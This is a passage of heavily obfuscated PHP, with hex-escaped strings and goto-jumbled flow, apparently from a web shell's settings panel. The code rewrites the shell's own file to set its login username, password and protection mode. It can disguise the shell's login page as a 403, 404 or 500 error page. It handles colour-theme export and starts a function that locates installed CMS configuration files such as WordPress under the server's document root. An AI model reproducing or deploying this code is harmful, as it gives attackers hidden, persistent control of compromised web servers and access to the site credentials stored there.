"\57\47\163\x68\157\167\137\x69\x63\x6f\156\163\x27\x28\56\x2a\x3f\51\54\x2f\x69"; goto jPAF0; TgoGf: $data = @file_get_contents($basename); goto y2P_U; haESl: if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "\47\x6c\157\x67\151\x6e\x5f\x70\141\147\x65\x27\40\x3d\x3e\40\47" . $lgpage . "\x27\54"; $data = str_replace($e[0], $new, $data); } goto UXI2T; UXI2T: if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "\47\x73\141\146\x65\x6d\157\x64\145\47\40\x3d\x3e\40\x27" . $protect . "\x27\54"; $data = str_replace($e[0], $new, $data); } goto rPSWO; zhC3X: $protect = $_POST["\141\x6c\x66\x61\x31"]; goto FUvdC; zQs2k: if (@file_put_contents($basename, $data)) { echo "\x3c\142\76\x55\x73\145\x72\x4e\x61\155\145\72\40\74\57\142\x3e\x3c\x66\x6f\x6e\164\40\143\157\x6c\157\162\75\x22\x67\x72\145\145\x6e\x22\x3e\74\x62\x3e" . $username . "\x3c\57\x62\76\x3c\x2f\x66\157\156\x74\x3e\74\142\x72\x20\x2f\76\x3c\142\76\x50\141\x73\x73\167\x6f\x72\144\x3a\40\x3c\x2f\142\76\74\146\157\156\164\x20\143\x6f\x6c\157\162\75\42\147\162\145\x65\156\42\x3e\74\x62\x3e" . $_POST["\141\x6c\x66\141\64"] . "\x3c\57\142\76\74\x2f\146\x6f\156\x74\76\x3c\x73\x63\x72\151\160\164\x3e\160\x6f\163\x74\x5f\145\156\x63\162\x79\160\164\x69\x6f\156\137\155\157\x64\145\40\x3d\40" . $post_encrypt . "\73\74\x2f\163\x63\162\x69\x70\164\x3e"; } else { __alert("\x3c\x73\160\x61\x6e\x20\x73\164\x79\154\145\75\x27\x63\157\x6c\157\x72\72\x72\145\144\x3b\x27\x3e\x46\x69\x6c\x65\40\x68\x61\x73\x20\156\x6f\40\x65\x64\x69\x74\x20\141\x63\x63\145\163\163\x2e\56\56\41\74\x2f\x73\x70\141\156\76"); } goto KmZ00; uCNa2: $find_pw = "\57\47\160\x61\x73\163\x27\50\56\x2a\x3f\x29\x2c\57\x69"; goto gbbf8; zIuSp: $username = $_POST["\x61\154\x66\141\63"]; goto J3j1x; kpJC_: $find_p = "\57\x27\x73\x61\146\145\155\157\x64\145\47\50\56\x2a\77\51\54\57\151"; goto RIvNV; jPAF0: $postEnc = "\57\x27\160\x6f\163\x74\137\x65\156\x63\162\171\160\164\x69\157\x6e\x27\x28\56\52\77\51\54\57\x69"; goto lMCsP; lMCsP: if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "\x27\x75\163\x65\x72\47\40\75\x3e\x20\47" . $username . "\x27\54"; $data = str_replace($e[0], $new, $data); } goto GKThc; y2P_U: $find_user = "\x2f\x27\x75\x73\x65\x72\47\x28\56\x2a\77\x29\54\57\x69"; goto uCNa2; OzvnE: $basename = @basename($_SERVER["\x50\x48\x50\137\x53\x45\x4c\106"]); goto TgoGf; FUvdC: $lgpage = $_POST["\141\x6c\146\141\x32"]; goto zIuSp; CnnCf: $icon = $_POST["\141\154\146\x61\x36"]; goto e2grQ; KmZ00: } else { __alert("\74\x73\160\x61\156\40\x73\x74\x79\x6c\145\75\x27\143\x6f\x6c\157\x72\x3a\162\145\x64\73\47\x3e\x55\x73\x65\162\x4e\x61\x6d\145\40\x69\x73\x20\105\x6d\x70\164\171\40\x21\x3c\57\x73\x70\x61\156\x3e"); } } goto VWS3I; B0zuz: $login_html = ''; goto aD6Kg; tFuT9: $lg_array = array("\x67\165\x69" => "\107\x55\111", "\x35\x30\60" => "\x35\60\60\40\111\x6e\x74\145\x72\x6e\141\x6c\x20\x53\x65\162\166\x65\x72\x20\105\x72\162\x6f\162", "\64\60\63" => "\x34\60\x33\40\106\157\x72\142\x69\144\x64\x65\x6e", "\x34\x30\64" => "\x34\60\x34\40\x4e\157\x74\x46\157\165\156\144"); goto SQklH; SQklH: foreach ($lg_array as $key => $val) { $login_html .= "\74\x6f\160\164\x69\157\156\x20\166\141\x6c\165\x65\x3d\x22" . $key . "\42\40" . ($GLOBALS["\x44\102\x5f\x4e\101\115\105"]["\x6c\x6f\x67\x69\x6e\137\x70\x61\147\x65"] == $key ? "\x73\145\154\x65\x63\164\x65\144" : '') . "\x3e" . $val . "\x3c\x2f\x6f\x70\164\x69\157\x6e\76"; } goto sIUyL; X0Nv4: echo "\x3c\x74\x61\142\x6c\x65\x20\142\x6f\x72\x64\x65\162\x3d\x22\x31\x22\76\74\x74\x62\x6f\144\171\76\x3c\164\162\x3e\74\164\x64\x3e\74\144\x69\166\40\x63\x6c\141\163\x73\x3d\42\164\142\154\x74\170\x74\42\40\163\164\x79\x6c\145\75\x22\x63\x6f\x6c\157\162\72\43\x46\106\106\106\x46\106\x22\76\120\x72\x6f\x74\145\143\x74\x3a\x3c\57\x64\151\x76\76\74\57\x74\x64\x3e\x3c\164\x64\76\74\x73\x65\x6c\x65\x63\164\40\156\141\155\145\75\42\x70\x72\157\164\145\143\x74\x22\x20\x73\x74\171\154\145\x3d\x22\167\x69\x64\164\x68\72\x31\x30\60\45\73\42\x3e" . $protect_html . "\74\57\163\145\x6c\x65\x63\164\76\74\57\164\144\76\x3c\57\x74\x72\76\74\164\x72\x3e\74\164\144\x3e\x3c\144\151\x76\x20\143\x6c\x61\163\163\x3d\42\x74\142\x6c\x74\x78\x74\x22\x20\163\164\x79\x6c\x65\x3d\42\x63\157\154\x6f\162\x3a\x23\x46\106\106\x46\106\x46\42\x3e\x50\157\x73\164\x20\x45\156\143\162\x79\x70\164\x69\x6f\x6e\72\x3c\x2f\144\151\166\x3e\x3c\57\x74\x64\x3e\x3c\164\x64\76\74\x73\x65\154\145\143\x74\40\x6e\141\155\x65\x3d\x22\x70\x6f\163\164\137\x65\x6e\x63\162\171\160\164\x22\x20\x73\x74\x79\x6c\145\x3d\42\167\x69\144\x74\x68\x3a\x31\60\60\x25\73\42\76" . $postEnc_html . "\x3c\57\x73\x65\154\145\143\164\x3e\x3c\57\x74\144\x3e\x3c\57\x74\x72\76\74\164\x72\76\74\164\144\x3e\x3c\x64\151\166\40\143\x6c\x61\163\163\75\x22\x74\x62\x6c\x74\x78\164\x22\x20\163\164\x79\154\145\x3d\42\143\157\154\157\x72\x3a\x23\x46\106\106\x46\x46\106\x22\x3e\123\150\x6f\x77\40\111\143\x6f\x6e\163\x3a\x3c\57\144\151\x76\x3e\x3c\x2f\164\144\x3e\74\164\144\76\74\163\145\154\x65\143\164\x20\156\141\155\x65\x3d\x22\x69\143\x6f\x6e\x22\40\163\x74\171\154\x65\x3d\42\167\151\144\x74\150\x3a\x31\60\60\45\x3b\x22\x3e" . $icon_html . "\74\57\x73\x65\x6c\145\143\164\x3e\x3c\57\x74\x64\76\74\x2f\164\162\x3e\74\x74\162\x3e\x3c\x74\x64\x3e\74\144\151\166\40\143\154\141\x73\163\x3d\42\164\142\x6c\x74\x78\x74\42\40\x73\x74\x79\x6c\x65\75\x22\x63\157\x6c\157\x72\72\x23\106\106\x46\106\106\x46\42\76\x6c\x6f\147\x69\156\x20\x50\141\147\145\x3a\74\x2f\144\151\166\x3e\x3c\57\164\144\x3e\x3c\x74\x64\76\74\x73\x65\x6c\145\x63\164\40\x73\164\x79\154\x65\x3d\42\x77\x69\144\164\150\x3a\x31\60\60\45\73\42\x20\156\141\155\x65\x3d\42\154\x67\x70\141\x67\145\42\76" . $login_html . "\x3c\x2f\163\x65\154\x65\x63\164\76\74\57\x74\144\76\x3c\x2f\164\x72\76\74\164\x72\x3e\74\164\x64\76\74\x64\151\166\40\143\x6c\x61\163\163\x3d\42\x74\142\154\164\170\164\x22\x20\x73\x74\x79\x6c\x65\75\42\143\x6f\x6c\x6f\162\x3a\43\x46\106\106\x46\x46\106\x22\76\125\163\x65\x72\116\x61\155\145\72\x3c\57\x64\151\x76\76\x3c\x2f\x74\x64\76\x3c\164\144\76\x3c\151\156\160\x75\164\x20\x74\171\x70\145\75\42\x74\145\170\164\x22\40\163\164\171\154\145\x3d\x22\x77\151\x64\164\150\x3a\71\x35\x25\73\42\40\x6e\141\x6d\x65\x3d\42\165\x73\145\x72\156\141\155\145\42\40\x76\141\154\x75\x65\x3d\42" . (empty($_POST["\141\154\x66\141\63"]) ? $GLOBALS["\x44\102\137\x4e\x41\115\x45"]["\x75\163\x65\162"] : $_POST["\x61\x6c\x66\x61\63"]) . "\42\x20\x70\154\x61\143\x65\150\x6f\154\144\145\x72\75\42\163\x6f\154\145\x76\151\163\151\x62\x6c\x65\x22\x3e\74\57\164\144\76\74\57\164\162\x3e\74\x74\162\76\x3c\164\x64\x3e\74\x64\x69\166\x20\x63\154\141\163\163\x3d\x22\x74\142\x6c\x74\170\x74\x22\40\x73\164\171\154\x65\75\42\x63\x6f\x6c\x6f\162\72\43\106\106\x46\106\106\106\42\x3e\x50\141\163\x73\167\157\162\144\x3a\x3c\57\144\151\x76\x3e\74\x2f\x74\144\76\x3c\x74\x64\x3e\74\x69\156\x70\165\164\40\164\x79\x70\145\75\42\x74\x65\x78\x74\x22\x20\x73\x74\x79\154\x65\x3d\x22\x77\x69\144\164\150\x3a\71\x35\45\x3b\x22\40\156\141\155\145\x3d\x22\160\x61\163\x73\x77\x6f\162\x64\x22\x20\x70\x6c\141\x63\x65\150\157\154\x64\145\162\75\x22\52\x2a\x2a\x2a\52\x22\x3e\x3c\57\164\144\76\x3c\57\x74\162\x3e\74\57\x74\x62\x6f\x64\171\76\x3c\x2f\x74\141\x62\x6c\145\x3e\x3c\x69\x6e\x70\x75\164\40\164\171\x70\145\75\x22\150\151\x64\144\145\156\x22\40\156\141\x6d\145\75\x22\145\42\40\x76\x61\154\x75\x65\75\42" . $GLOBALS["\x44\102\137\116\101\x4d\x45"]["\163\x61\x66\x65\155\x6f\144\x65"] . "\42\x3e\x3c\x69\156\x70\x75\164\40\164\x79\160\x65\x3d\42\150\x69\x64\144\x65\156\x22\x20\156\141\x6d\x65\x3d\x22\163\42\x20\x76\x61\x6c\x75\x65\75\42" . $GLOBALS["\104\x42\137\x4e\x41\115\105"]["\163\x68\x6f\167\x5f\x69\x63\157\156\163"] . "\42\76\x3c\x70\76\x3c\151\x6e\x70\x75\164\x20\x74\x79\x70\x65\75\x22\x73\x75\142\155\151\164\42\40\156\141\155\x65\x3d\42\142\x74\x6e\x22\40\x76\x61\x6c\165\x65\x3d\x22\40\42\76\x3c\x2f\160\x3e\74\57\x66\157\x72\155\x3e\74\x2f\143\145\x6e\x74\x65\162\x3e"; goto dZhUY; DIyOG: $penc_array = array("\146\x61\x6c\163\145" => "\116\157", "\x74\x72\165\x65" => "\x59\x65\163"); goto vcfj2; yi5bj: echo "\74\160\x3e\x3c\143\145\x6e\164\x65\x72\x3e\x3c\x64\x69\166\x20\143\x6c\x61\x73\x73\75\x22\x74\x78\x74\146\157\x6e\164\137\150\x65\141\144\145\x72\42\x3e\174\40\x53\x65\x74\164\x69\156\147\163\x20\x7c\x3c\57\144\151\166\x3e\x3c\x2f\x70\76\74\x66\157\x72\x6d\x20\157\x6e\123\x75\142\155\151\x74\75\x22\162\145\x6c\x6f\x61\144\x53\145\164\164\151\x6e\x67\50\164\x68\x69\x73\x29\73\162\145\x74\165\x72\156\x20\146\x61\154\163\x65\x3b\42\x20\x6d\145\x74\150\157\144\x3d\x27\160\157\163\164\x27\76"; goto s2F3z; sIUyL: echo ''; goto X0Nv4; vcfj2: $protect_html = ''; goto hhWXE; hhWXE: $icon_html = ''; goto Nij5W; s2F3z: $lg_array = array("\60" => "\x4e\x6f", "\61" => "\131\x65\163"); goto DIyOG; OmUNA: foreach ($lg_array as $key => $val) { $icon_html .= "\x3c\x6f\160\164\x69\157\156\40\166\x61\x6c\x75\x65\75\x22" . $key . "\42\x20" . ($GLOBALS["\104\x42\137\116\101\115\x45"]["\163\x68\157\x77\137\x69\143\x6f\156\x73"] == "\x31" ? "\x73\x65\154\145\143\164\145\x64" : '') . "\76" . $val . "\74\57\157\x70\x74\151\x6f\x6e\76"; } goto xsLcN; aD6Kg: foreach ($lg_array as $key => $val) { $protect_html .= "\74\x6f\x70\x74\x69\x6f\x6e\x20\x76\141\x6c\x75\x65\x3d\x22" . $key . "\42\x20" . ($GLOBALS["\x44\x42\137\116\x41\115\105"]["\x73\x61\x66\x65\x6d\157\x64\145"] == "\x31" ? "\163\x65\x6c\x65\x63\x74\x65\x64" : '') . "\76" . $val . "\x3c\57\x6f\160\164\151\157\156\76"; } goto OmUNA; VWS3I: } elseif ($_POST["\x61\154\146\141\70"] == "\x63\x6f\154\x6f\x72") { goto uS9OZ; f5aSX: if ($_POST["\x61\x6c\146\x61\67"] == "\145\170\160\x6f\x72\164") { goto o1NM8; jjWUa: $glob_colors = $GLOBALS["\137\137\101\x4c\x46\x41\137\x43\117\114\x4f\x52\137\137"]; goto Iflzg; Iflzg: $array = array(); goto gqlHG; gqlHG: foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["\x6b\x65\x79\x5f\143\157\154\x6f\162"] : $v); } $array[$k] = $v; } goto DoT4v; o1NM8: echo __pre(); goto PCNLd; DoT4v: $file = "\x61\154\x66\x61\x5f\x63\x6f\154\157\162\x5f\143\x6f\x6e\x66\x69\x67\137" . date("\x59\55\155\55\144\x2d\150\137\x69\x5f\163") . "\56\143\x6f\156\146"; goto vPxA0; xwWrg: if (!@file_put_contents($file, $config)) { echo "\x3c\160\76\x3c\143\x65\156\x74\x65\x72\x3e\103\x6f\154\157\162\40\x43\x6f\156\x66\151\147\72\x3c\142\162\76\74\x62\x72\76\x3c\x74\145\x78\x74\141\x72\145\141\40\162\x6f\167\x73\x3d\x22\x31\x32\x22\x20\x63\x6f\154\x73\75\42\x37\x30\x22\40\164\171\x70\x65\75\x22\164\145\170\x74\42\76" . $config . "\x3c\x2f\164\145\x78\x74\141\x72\x65\x61\x3e\74\57\143\x65\x6e\164\145\x72\x3e\x3c\x2f\160\76"; } else { echo "\74\x68\x33\76\74\x70\76\74\x63\x65\x6e\x74\145\162\x3e\74\141\40\x63\154\141\163\x73\75\x22\x61\x63\164\x69\x6f\156\163\42\x20\x68\x72\145\x66\x3d\x22\152\141\x76\x61\x73\x63\x72\x69\x70\x74\72\166\x6f\x69\x64\x28\x30\51\73\x22\40\x6f\156\143\154\151\143\x6b\75\42\147\50\47\106\151\154\145\x73\x54\x6f\x6f\x6c\x73\47\x2c\156\165\154\x6c\54\x27" . $file . "\x27\x2c\x20\47\144\157\x77\x6e\154\x6f\141\x64\x27\x29\x22\x3e\74\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\x3d\42\x23\x30\x46\60\x22\76\104\157\x77\156\154\157\x61\144\40\103\x6f\x6e\x66\151\147\x3c\57\146\157\x6e\164\76\x3c\x2f\141\76\x3c\x2f\143\145\156\x74\145\162\x3e\x3c\x2f\x70\x3e\x3c\x2f\150\63\76"; } goto gSl12; PCNLd: $colors = is_array($GLOBALS["\x44\x42\x5f\116\x41\x4d\x45"]["\143\x6f\154\157\x72"]) ? $GLOBALS["\x44\x42\x5f\x4e\x41\115\105"]["\x63\x6f\154\157\x72"] : array(); goto jjWUa; vPxA0: $config = json_encode($array, JSON_PRETTY_PRINT); goto xwWrg; gSl12: } goto j6nxs; nHsaK: echo "\x3c\164\x72\x3e\x3c\164\144\40\x73\x74\171\x6c\145\75\42\x74\145\170\x74\x2d\x61\x6c\x69\x67\x6e\x3a\x63\x65\156\164\145\x72\x3b\42\x3e\55\74\57\164\x64\76\x3c\x74\144\x20\163\164\171\154\145\75\42\x74\145\x78\x74\55\x61\x6c\x69\147\x6e\72\x63\x65\156\x74\145\x72\73\x22\x3e\74\144\151\166\40\143\x6c\141\163\x73\x3d\42\164\x62\154\164\170\164\x22\76\52\74\x2f\144\151\166\76\x3c\x2f\x74\x64\x3e\x3c\x74\x64\76\74\x64\x69\x76\x20\163\x74\171\154\x65\x3d\42\x6d\x61\162\147\x69\x6e\55\154\145\146\x74\72\x35\160\170\73\42\x20\143\154\141\163\163\x3d\x22\x74\142\x6c\164\x78\x74\42\76\x55\x73\145\40\104\145\146\x61\x75\154\x74\40\x43\157\x6c\157\x72\72\x3c\x2f\x64\x69\x76\x3e\x3c\x2f\164\144\76\x3c\x74\x64\x3e\x3c\57\x74\x64\x3e\x3c\164\x64\x3e\74\x63\x65\x6e\164\x65\162\x3e\x3c\x69\x6e\x70\x75\164\x20\x74\x79\160\145\x3d\x22\143\150\145\x63\x6b\142\157\x78\42\x20\x69\144\x3d\x22\165\163\x65\x5f\144\145\146\x61\x75\x6c\x74\137\143\x6f\154\157\x72\x22\x20\x76\x61\x6c\165\145\x3d\42\61\x22\76\x3c\x2f\x63\145\x6e\164\x65\x72\x3e\x3c\57\x74\x64\x3e\74\x2f\164\x72\76"; goto acP2r; geaBD: echo "\74\x74\141\142\x6c\x65\x20\x62\157\162\x64\x65\162\75\42\x31\42\76\x3c\x74\x62\x6f\144\171\76"; goto X96ko; QLLYN: $x = 1; goto E1v9c; E1v9c: foreach ($GLOBALS["\137\x5f\x41\x4c\106\x41\137\103\x4f\114\x4f\x52\x5f\x5f"] as $key => $value) { goto DZ2ZB; DZ2ZB: $multi = ''; goto U18PG; U18PG: if (is_array($value)) { if (isset($value["\x6d\x75\x6c\x74\x69\x5f\163\x65\x6c\x65\143\x74\x6f\x72"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } goto tlvjz; tlvjz: $value = alfa_getColor($key); goto kjCH4; x7pHr: echo str_replace(array("\173\151\x6e\x64\x65\x78\175", "\173\x74\x61\162\x67\x65\x74\175", "\173\x63\x6f\154\157\162\x7d", "\173\155\165\154\x74\x69\x7d", "\x7b\150\145\154\160\175"), array($x++, $key, $value, $multi, $help), $template); goto mYf0U; kjCH4: $help = strtolower(str_replace(array("\72", "\53"), array("\x5f", "\x5f\x70\154\165\x73"), $key)); goto x7pHr; mYf0U: } goto nHsaK; uS9OZ: echo "\74\143\145\x6e\164\x65\x72\76\x3c\x70\76\74\144\x69\x76\40\143\x6c\141\x73\x73\75\42\x74\x78\x74\146\x6f\156\164\x5f\x68\145\141\144\x65\x72\42\76\x7c\40\103\x75\163\164\157\155\x20\x43\x6f\154\157\162\40\174\x3c\x2f\144\x69\166\x3e\x3c\x2f\x70\76\x3c\x66\x6f\x72\x6d\40\x6f\x6e\123\165\x62\155\x69\164\x3d\42\162\145\154\157\x61\x64\103\x6f\x6c\157\x72\x73\x28\51\x3b\x72\145\x74\165\162\156\40\x66\x61\154\163\145\x3b\42\40\x6d\x65\164\x68\157\144\x3d\47\x70\157\163\164\47\76"; goto geaBD; acP2r: echo "\74\x2f\164\142\157\x64\171\76\74\x2f\164\141\x62\x6c\x65\76\x3c\x70\x3e\74\x69\x6e\x70\x75\x74\x20\x74\x79\x70\145\x3d\42\163\x75\142\x6d\151\164\x22\40\156\x61\155\x65\75\42\x62\164\x6e\42\40\166\x61\x6c\165\145\75\x22\40\x22\x3e\74\57\160\x3e\74\57\146\157\x72\155\x3e\74\x70\x3e\74\x62\x75\x74\164\157\156\40\x73\164\171\154\145\75\42\160\141\144\144\x69\156\x67\x3a\x34\x70\170\73\73\155\x61\162\147\x69\156\x2d\x72\x69\147\150\x74\x3a\x32\x30\x70\170\73\42\x20\x6f\156\x63\154\151\x63\153\75\42\x24\x28\47\151\x6d\160\157\x72\164\x46\x69\154\145\x42\164\x6e\x27\x29\x2e\143\x6c\x69\x63\153\50\x29\x3b\x22\x20\143\x6c\x61\163\x73\x3d\x22\x62\165\x74\164\x6f\156\42\76\40\x49\155\160\x6f\162\164\x20\x3c\57\142\x75\164\x74\x6f\x6e\76\40\x3c\142\x75\x74\x74\x6f\156\x20\x73\164\x79\x6c\145\75\42\x70\141\x64\144\x69\x6e\x67\x3a\64\160\x78\73\155\141\x72\147\151\x6e\x2d\x6c\145\146\x74\x3a\x32\60\x70\170\73\x22\40\157\156\143\x6c\x69\x63\x6b\75\x22\147\50\x27\x73\145\x74\164\151\156\147\163\x27\54\156\165\154\154\54\156\165\x6c\x6c\x2c\x6e\x75\154\x6c\54\156\x75\x6c\154\54\156\x75\x6c\154\x2c\x6e\165\154\154\x2c\156\x75\154\154\54\47\x65\x78\160\x6f\x72\x74\x27\54\47\x63\157\154\x6f\162\47\x29\42\x20\x63\154\141\x73\x73\75\42\x62\165\x74\164\157\156\x22\76\x20\x45\x78\x70\157\162\164\40\x3c\57\x62\x75\x74\x74\x6f\156\x3e\74\57\x63\x65\x6e\164\145\x72\76\74\57\160\x3e"; goto f5aSX; j6nxs: if ($_POST["\141\154\x66\x61\62"] == "\x3e\x3e") { goto vSLFa; vSLFa: echo __pre(); goto GhQEf; NE4sM: $array = ''; goto UdVHs; w5H5D: $basename = @basename($_SERVER["\120\110\x50\x5f\x53\105\114\x46"]); goto ympsC; h34WG: @chdir($GLOBALS["\150\157\155\x65\137\x63\167\x64"]); goto w5H5D; ERPDL: if (preg_match($color, $data, $e)) { goto CPiQH; YYm1n: $data = str_replace($e[0], $new, $data); goto YjAjU; CPiQH: $new = "\x27\x63\157\x6c\157\x72\47\40\75\76\x20\141\162\162\x61\x79\x28" . $array . "\51\x2c"; goto YYm1n; YjAjU: if (@file_put_contents($basename, $data)) { echo "\x3c\143\x65\156\x74\x65\162\x3e\74\x70\76\74\x68\63\x3e\133\53\135\x20\123\165\143\143\x65\x73\163\56\56\56\x3c\57\x68\x33\x3e\x3c\x2f\x70\x3e\74\x2f\x63\145\x6e\x74\145\162\76\x3c\163\x63\x72\x69\160\164\76\154\x6f\x63\141\x74\x69\157\x6e\56\162\x65\x6c\x6f\141\144\50\51\73\x3c\x2f\163\x63\x72\151\160\164\76"; } else { echo "\x3c\143\x65\156\x74\x65\x72\x3e\x3c\x70\76\74\x68\x33\x3e\133\x2d\x5d\x20\x57\x65\40\116\x6f\164\x20\x68\141\166\x65\x20\x70\x65\x72\155\151\163\x73\151\157\x6e\40\x74\157\x20\105\x64\x69\x74\x20\163\150\145\x6c\x6c\56\56\x2e\x21\x3c\x2f\x68\x33\x3e\x3c\57\x70\76\74\x2f\143\x65\x6e\x74\145\x72\x3e"; } goto ezY2p; ezY2p: } else { echo "\74\x63\x65\156\164\145\162\76\x3c\x70\x3e\x3c\150\x33\76\x5b\55\x5d\40\x45\x72\x72\157\x72\x2e\56\x2e\41\x3c\57\x68\x33\76\x3c\57\x70\76\x3c\x2f\143\x65\156\164\145\162\76"; } goto fx9B9; ympsC: $data = @file_get_contents($basename); goto Af6Md; Af6Md: $color = "\x2f\x27\143\157\154\157\x72\x27\x28\56\x2a\77\51\x5c\51\x2c\x2f\x73"; goto ERPDL; UdVHs: $is_default = isset($_POST["\x61\x6c\x66\x61\63"]) && $_POST["\141\154\x66\x61\x33"] == "\61" ? true : false; goto AJYLn; GhQEf: $colors = json_decode($_POST["\141\154\x66\x61\61"], true); goto NE4sM; Z2eHE: foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["\x6b\145\x79\x5f\143\157\154\x6f\x72"] : $v); } $array .= "\x22" . trim($k) . "\42\40\75\76\x20\x22" . $v . "\x22\x2c"; } goto h34WG; AJYLn: $glob_colors = $GLOBALS["\137\x5f\101\x4c\106\x41\137\103\x4f\114\x4f\x52\137\137"]; goto Z2eHE; fx9B9: } goto FcN89; X96ko: $template = "\x3c\x74\162\76\x3c\164\144\x20\x73\x74\x79\x6c\145\75\42\x74\145\x78\164\55\141\x6c\151\147\156\72\143\x65\x6e\164\x65\x72\73\42\x3e\x3c\x61\x20\x68\x72\x65\x66\x3d\42\x68\164\164\160\72\57\57\x73\x6f\x6c\x65\x76\151\163\151\x62\154\145\x2e\143\157\155\x2f\x63\x75\x73\x74\157\155\143\157\x6c\157\x72\x73\x2f\173\150\145\154\x70\175\x2e\160\x6e\147\42\40\x74\141\x72\147\145\164\75\42\137\142\154\x61\156\x6b\42\76\74\146\157\156\164\x20\x63\x6f\154\157\162\75\42\x23\x30\60\x46\106\60\x30\x22\76\x48\145\154\160\x3c\x2f\146\157\x6e\164\76\x3c\x2f\x61\76\74\x2f\164\144\x3e\74\x74\144\x20\x73\x74\171\x6c\x65\75\42\164\x65\x78\x74\55\141\154\x69\147\x6e\72\x63\x65\156\164\145\162\x3b\x22\76\74\144\151\x76\x20\x63\x6c\x61\163\163\75\42\164\142\154\x74\x78\x74\42\x3e\173\151\x6e\x64\x65\170\175\x3c\57\144\151\166\76\x3c\x2f\164\x64\76\74\164\x64\x3e\74\144\x69\166\x20\143\x6c\141\x73\163\x3d\x22\x74\142\x6c\x74\170\x74\x22\x20\x73\164\x79\x6c\145\75\42\x6d\141\x72\147\151\x6e\55\x6c\x65\x66\164\72\x35\x70\170\73\42\76\173\x74\x61\162\x67\145\164\175\72\x3c\57\144\x69\x76\76\x3c\57\164\144\76\x3c\164\144\76\74\x69\x6e\160\x75\164\40\x73\x74\x79\x6c\x65\75\x22\167\151\144\x74\x68\x3a\x36\x30\160\x78\73\42\40\155\x75\154\x74\151\x3d\42\x7b\x6d\165\x6c\x74\151\175\42\x20\151\x64\75\42\x67\x75\x69\x5f\173\x74\x61\162\147\145\164\x7d\42\x20\x6f\x6e\x43\150\x61\156\x67\145\x3d\x22\x63\x6f\154\x6f\162\110\141\x6e\144\x6c\x65\162\x28\164\150\x69\163\51\73\x22\x20\x74\141\x72\x67\145\x74\75\42\x2e\x7b\x74\141\x72\x67\x65\164\x7d\42\x20\164\171\x70\x65\x3d\x22\x63\157\x6c\x6f\162\x22\x20\166\x61\154\165\x65\75\42\x7b\143\157\154\x6f\x72\x7d\x22\x3e\74\x2f\x74\144\76\x3c\164\x64\76\x3c\151\x6e\x70\x75\164\40\x74\171\160\145\x3d\x22\x74\145\170\x74\x22\40\x73\164\171\154\x65\75\x22\164\145\x78\x74\55\x61\154\151\147\x6e\x3a\x63\145\x6e\164\x65\162\73\42\40\x6d\165\x6c\164\x69\75\x22\173\x6d\x75\x6c\x74\151\x7d\x22\x20\x6f\156\x6b\145\x79\165\x70\75\x22\x63\x6f\154\157\x72\110\x61\156\144\x6c\145\162\113\x65\171\50\x74\150\x69\x73\51\x3b\42\x20\x74\x61\162\147\x65\x74\75\x22\56\x7b\164\x61\x72\147\145\164\x7d\x22\40\151\144\x3d\42\x69\156\x70\165\x74\x5f\173\x74\141\162\x67\145\x74\x7d\x22\x20\143\x6c\x61\163\x73\x3d\42\x63\x6f\x6c\x6f\x72\163\137\151\156\x70\165\164\x22\40\x70\x6c\x61\x63\145\150\157\154\x64\x65\x72\x3d\x22\x23\146\x66\x66\x66\x66\x66\42\x20\166\x61\154\x75\x65\x3d\x22\x7b\143\x6f\154\x6f\x72\x7d\42\x3e\74\x2f\x74\x64\x3e\x3c\57\x74\x72\x3e"; goto QLLYN; FcN89: } goto jazRu; zVMuV: alfahead(); goto ank54; npFDh: } goto tFDUs; RFckQ: $RxPWPyQqTL = "\x63\x68\141" . "\x72" . "\103\157\144" . "\145" . "\x41" . "\x74" . ''; goto oq_nl; W2kYD: function getConfigHtml($cms) { goto m1R4w; SRdjS: $content .= "\74\x2f\x66\x6f\x72\x6d\76"; goto nnXr8; nnXr8: return $content; goto IDB02; cQ0Em: foreach ($cms_array as $key => $val) { $content .= "\x3c\157\x70\164\151\x6f\156\40\x76\141\154\x75\x65\75\47{$key}\x27\40" . ($key == $cms ? "\x73\x65\x6c\145\x63\164\x65\144\75\163\x65\x6c\x65\x63\164\145\x64" : '') . "\x3e{$val}\x3c\57\x6f\160\164\151\x6f\x6e\76"; } goto DUNWE; CtITF: $content .= "\x3c\146\157\162\x6d\40\157\x6e\x53\165\x62\155\x69\x74\75\x27\x67\50\42\x47\x65\x74\x43\157\x6e\x66\151\147\x22\54\156\165\x6c\154\54\164\150\x69\x73\x2e\x63\155\163\56\x76\x61\154\165\x65\x2c\164\x68\151\x73\56\x70\141\x74\x68\56\166\141\x6c\x75\145\51\x3b\x72\145\x74\x75\x72\x6e\40\x66\141\x6c\163\145\x3b\x27\76\x3c\x64\151\166\40\143\x6c\x61\x73\163\75\x27\x74\x78\164\146\x6f\156\x74\47\76\x43\x6d\x73\72\40\x3c\x2f\144\x69\166\x3e\x20\74\163\x65\x6c\x65\143\x74\40\x6e\141\155\145\75\47\x63\x6d\x73\x27\163\x74\x79\x6c\145\x3d\47\167\151\x64\164\x68\72\x31\x30\60\160\170\x3b\47\x3e"; goto cQ0Em; m1R4w: $content = ''; goto zJhSb; DUNWE: $content .= "\74\x2f\x73\x65\154\x65\x63\164\x3e\x20\74\x64\151\166\40\143\154\141\x73\163\75\47\x74\170\164\x66\157\156\164\47\x3e\x50\x61\164\150\50\151\x6e\x73\164\141\x6c\154\x65\x64\x20\x63\x6d\163\57\103\157\156\x66\x69\x67\51\x3a\x20\74\57\144\x69\x76\76\40\74\151\x6e\x70\x75\x74\40\x74\171\160\145\x3d\x27\164\x65\170\x74\47\x20\156\141\155\145\75\x27\x70\x61\164\150\x27\x20\x76\141\154\x75\x65\75\x27" . $_SERVER["\x44\x4f\x43\x55\x4d\x45\116\x54\x5f\x52\117\117\x54"] . "\57\x27\x20\163\151\x7a\x65\x3d\x27\x33\x30\47\40\57\x3e\40\74\x62\x75\164\x74\x6f\156\x20\143\x6c\x61\163\163\x3d\x27\142\x75\x74\x74\x6f\x6e\x27\x3e\107\145\x74\x43\157\156\x66\151\x67\x3c\57\142\x75\x74\x74\x6f\156\76"; goto SRdjS; zJhSb: $cms_array = array("\x77\x70" => "\127\x6f\162\x64\120\162\x65\x73\x73", 